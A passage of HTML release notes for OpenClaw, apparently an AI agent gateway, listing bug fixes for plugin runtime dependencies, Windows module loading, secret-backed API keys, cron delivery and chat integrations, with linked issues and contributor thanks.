<li>Agents/bootstrap: refresh cached workspace bootstrap snapshots on long-lived main-session turns when <code>AGENTS.md</code>, <code>SOUL.md</code>, <code>MEMORY.md</code>, or <code>TOOLS.md</code> change on disk, while preserving unchanged snapshot identity through the workspace file cache. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245012829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64871/hovercard" href="https://github.com/openclaw/openclaw/pull/64871">#64871</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063325217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43901" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43901/hovercard" href="https://github.com/openclaw/openclaw/pull/43901">#43901</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3989354959" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26497" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26497/hovercard" href="https://github.com/openclaw/openclaw/issues/26497">#26497</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4000351209" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/28594" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/28594/hovercard" href="https://github.com/openclaw/openclaw/issues/28594">#28594</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4008006931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/30896/hovercard" href="https://github.com/openclaw/openclaw/issues/30896">#30896</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aimqwest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aimqwest">@aimqwest</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mikejuyoon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mikejuyoon">@mikejuyoon</a>.</li>
<li>macOS Gateway: detect installed-but-unloaded LaunchAgent split-brain states during status, doctor, and restart, and re-bootstrap launchd supervision before falling back to unmanaged listener restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270911583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67335" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67335/hovercard" href="https://github.com/openclaw/openclaw/issues/67335">#67335</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4125657224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53475" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53475/hovercard" href="https://github.com/openclaw/openclaw/issues/53475">#53475</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322280015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71060/hovercard" href="https://github.com/openclaw/openclaw/issues/71060">#71060</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185336537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58890" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58890/hovercard" href="https://github.com/openclaw/openclaw/issues/58890">#58890</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204966968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60885/hovercard" href="https://github.com/openclaw/openclaw/issues/60885">#60885</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319157550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70801" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70801/hovercard" href="https://github.com/openclaw/openclaw/issues/70801">#70801</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ze1tgeist88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ze1tgeist88">@ze1tgeist88</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dafacto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dafacto">@dafacto</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</li>
<li>Plugins/install: treat mirrored core logger dependencies as staged bundled runtime deps so packaged Gateway starts do not crash when the external plugin-runtime-deps root is missing <code>tslog</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331181809" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72228/hovercard" href="https://github.com/openclaw/openclaw/issues/72228">#72228</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332620459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72493" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72493/hovercard" href="https://github.com/openclaw/openclaw/pull/72493">#72493</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepujain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepujain">@deepujain</a>.</li>
<li>Build/plugins: preserve active bundled runtime-dependency staging temp directories owned by live build processes so overlapping postbuild runs no longer delete each other's staged deps mid-prune. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331140342" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72220" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72220/hovercard" href="https://github.com/openclaw/openclaw/pull/72220">#72220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Plugins/install: hide bundled runtime-dependency npm child windows on Windows across Gateway startup, postinstall, and packaged staging paths so Telegram/Anthropic dependency repair no longer flashes shell windows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331615103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72315/hovercard" href="https://github.com/openclaw/openclaw/issues/72315">#72315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/athuljayaram/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/athuljayaram">@athuljayaram</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshfeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshfeng">@joshfeng</a>.</li>
<li>Agents/Windows: normalize lazy agent runtime imports before Node ESM loading so Windows drive-letter <code>subagent-registry</code> runtime paths no longer fail every agent task with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333477433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72636" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72636/hovercard" href="https://github.com/openclaw/openclaw/issues/72636">#72636</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334354906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72716/hovercard" href="https://github.com/openclaw/openclaw/pull/72716">#72716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Andyz-CData/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Andyz-CData">@Andyz-CData</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xialonglee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xialonglee">@xialonglee</a>.</li>
<li>Plugins/Windows: normalize lazy plugin service override imports before Node ESM loading so drive-letter browser-control module paths no longer fail with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332955345" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72573/hovercard" href="https://github.com/openclaw/openclaw/issues/72573">#72573</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333188067" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72599" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72599/hovercard" href="https://github.com/openclaw/openclaw/pull/72599">#72599</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333023955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72582/hovercard" href="https://github.com/openclaw/openclaw/pull/72582">#72582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/llzzww316/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/llzzww316">@llzzww316</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feineryonah-byte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feineryonah-byte">@feineryonah-byte</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WuKongAI-CMU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WuKongAI-CMU">@WuKongAI-CMU</a>.</li>
<li>Browser/plugins: load <code>playwright-core</code> through the browser runtime shim so packaged installs can run Playwright actions from staged plugin runtime deps after doctor/startup repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330902734" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72168/hovercard" href="https://github.com/openclaw/openclaw/issues/72168">#72168</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331230145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72238/hovercard" href="https://github.com/openclaw/openclaw/pull/72238">#72238</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zdg1110/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zdg1110">@zdg1110</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>Plugins/install: stage bundled plugin runtime dependencies before Gateway startup, drain update restarts, and materialize plugin-owned root chunks in external mirrors so staged deps resolve under native ESM. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330416924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72058" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72058/hovercard" href="https://github.com/openclaw/openclaw/issues/72058">#72058</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330508233" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72084" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72084/hovercard" href="https://github.com/openclaw/openclaw/pull/72084">#72084</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amnesia106/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amnesia106">@amnesia106</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drvoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drvoss">@drvoss</a>.</li>
<li>TTS/SecretRef: resolve <code>messages.tts.providers.*.apiKey</code> from the active runtime snapshot so SecretRef-backed MiniMax and other TTS provider keys work in runtime reply/audio paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289130983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68690/hovercard" href="https://github.com/openclaw/openclaw/issues/68690">#68690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Gateway/install: surface systemd user-bus recovery hints during Linux service activation and retry via the target user scope when <code>systemctl --user</code> reports no-medium bus failures, without letting stale <code>SUDO_USER</code> override <code>sudo -u</code> installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040941886" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39673/hovercard" href="https://github.com/openclaw/openclaw/issues/39673">#39673</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067677546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44417/hovercard" href="https://github.com/openclaw/openclaw/issues/44417">#44417</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229610817" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63561" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63561/hovercard" href="https://github.com/openclaw/openclaw/issues/63561">#63561</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Arbor4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Arbor4">@Arbor4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myrsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myrsu">@myrsu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mssteuer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mssteuer">@mssteuer</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boyuaner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boyuaner">@boyuaner</a>.</li>
<li>CLI/nodes: make unfiltered <code>openclaw nodes list</code> prefer the effective paired-node view used by <code>nodes status</code> while preserving pending rows, pairing-scope fallback, terminal-safe table rendering, and paired JSON metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077580136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46871" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46871/hovercard" href="https://github.com/openclaw/openclaw/issues/46871">#46871</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252092457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65772/hovercard" href="https://github.com/openclaw/openclaw/pull/65772">#65772</a> through the ProjectClownfish <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333343041" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72619" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72619/hovercard" href="https://github.com/openclaw/openclaw/pull/72619">#72619</a> repair. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skainguyen1412/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skainguyen1412">@skainguyen1412</a>.</li>
<li>CLI/startup: read generated startup metadata from the bundled <code>dist</code> layout before falling back to live help rendering, so root/browser help and channel-option bootstrap stay on the fast path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/Lark: stop treating broadcast-only <code>@all</code>/<code>@_all</code> messages as bot mentions while preserving direct bot mentions, including messages that also include <code>@all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033693984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37706/hovercard" href="https://github.com/openclaw/openclaw/issues/37706">#37706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JosepLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JosepLee">@JosepLee</a>.</li>
<li>CLI/help: treat positional <code>help</code> invocations like <code>openclaw channels help</code> as help paths for startup gating, avoiding model/auth warmup while preserving positional arguments such as <code>openclaw docs help</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Web search: route plugin-scoped web_search SecretRefs through the active runtime config snapshot so provider execution receives resolved credentials across app/runtime paths, including <code>plugins.entries.brave.config.webSearch.apiKey</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289130983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68690/hovercard" href="https://github.com/openclaw/openclaw/issues/68690">#68690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Voice Call: allow SecretRef-backed Twilio auth tokens and call-specific OpenAI/ElevenLabs TTS API keys through the plugin config surface. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289130983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68690/hovercard" href="https://github.com/openclaw/openclaw/issues/68690">#68690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Google Meet/Voice Call: clean stale chrome-node realtime bridges before rejoining, expose bridge inspection, tolerate transient node input pull failures, default Chrome command-pair audio to 24 kHz PCM16 while preserving legacy 8 kHz G.711 mu-law pairs, handle Gemini Live interruptions/VAD and function-response names correctly, route stateful <code>google_meet</code> tools through the gateway runtime, support <code>realtime.agentId</code>, and send non-blocking consult continuations before long tool-backed answers finish. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332050444" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72371/hovercard" href="https://github.com/openclaw/openclaw/issues/72371">#72371</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332743811" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72525/hovercard" href="https://github.com/openclaw/openclaw/issues/72525">#72525</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332742867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72523" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72523/hovercard" href="https://github.com/openclaw/openclaw/issues/72523">#72523</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332383464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72440" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72440/hovercard" href="https://github.com/openclaw/openclaw/issues/72440">#72440</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332290261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72425" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72425/hovercard" href="https://github.com/openclaw/openclaw/issues/72425">#72425</a>; (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332050745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72372/hovercard" href="https://github.com/openclaw/openclaw/pull/72372">#72372</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332743254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72524" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72524/hovercard" href="https://github.com/openclaw/openclaw/pull/72524">#72524</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332097646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72381" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72381/hovercard" href="https://github.com/openclaw/openclaw/pull/72381">#72381</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332388165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72441" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72441/hovercard" href="https://github.com/openclaw/openclaw/pull/72441">#72441</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330987894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72189/hovercard" href="https://github.com/openclaw/openclaw/pull/72189">#72189</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332290401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72426" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72426/hovercard" href="https://github.com/openclaw/openclaw/pull/72426">#72426</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Discord/media: keep incidental Markdown image badges in final replies as text unless a channel opts into Markdown-image media extraction, while preserving Telegram Markdown-image media replies and explicit <code>MEDIA:</code> attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333512243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72642/hovercard" href="https://github.com/openclaw/openclaw/issues/72642">#72642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>.</li>
<li>Matrix/E2EE: stabilize recovery and broken-device QA flows while avoiding Matrix device-cleanup sync races that could leave shutdown-time crypto work running. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Cron: apply <code>cron.maxConcurrentRuns</code> to the nested isolated-agent lane, start isolated execution timeouts only after the runner enters that lane, keep legacy flat <code>jobs.json</code> rows loadable, invalidate stale pending runtime slots after schedule edits, and preserve due slots for formatting-only rewrites. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334195587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72707" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72707/hovercard" href="https://github.com/openclaw/openclaw/issues/72707">#72707</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3998171451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27996" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/27996/hovercard" href="https://github.com/openclaw/openclaw/issues/27996">#27996</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328262576" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71607/hovercard" href="https://github.com/openclaw/openclaw/issues/71607">#71607</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049490726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41783/hovercard" href="https://github.com/openclaw/openclaw/issues/41783">#41783</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328629024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71651" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71651/hovercard" href="https://github.com/openclaw/openclaw/pull/71651">#71651</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xialonglee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xialonglee">@xialonglee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fagnersouza666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fagnersouza666">@fagnersouza666</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayanesakura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayanesakura">@ayanesakura</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hurray0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hurray0">@Hurray0</a>.</li>
<li>Cron/delivery: classify isolated successes, quiet <code>NO_REPLY</code> turns, model/provider failures, execution denials, <code>--no-deliver</code> traces, skipped-job alerts, and verified delivery outcomes correctly so cron history, retries, and failure counters reflect what actually happened. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334620088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72732/hovercard" href="https://github.com/openclaw/openclaw/issues/72732">#72732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099027844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50170" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50170/hovercard" href="https://github.com/openclaw/openclaw/issues/50170">#50170</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061722670" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43604/hovercard" href="https://github.com/openclaw/openclaw/issues/43604">#43604</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287182300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68452/hovercard" href="https://github.com/openclaw/openclaw/issues/68452">#68452</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204696109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60846" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60846/hovercard" href="https://github.com/openclaw/openclaw/issues/60846">#60846</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331088054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72210" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72210/hovercard" href="https://github.com/openclaw/openclaw/issues/72210">#72210</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268858101" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67172" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67172/hovercard" 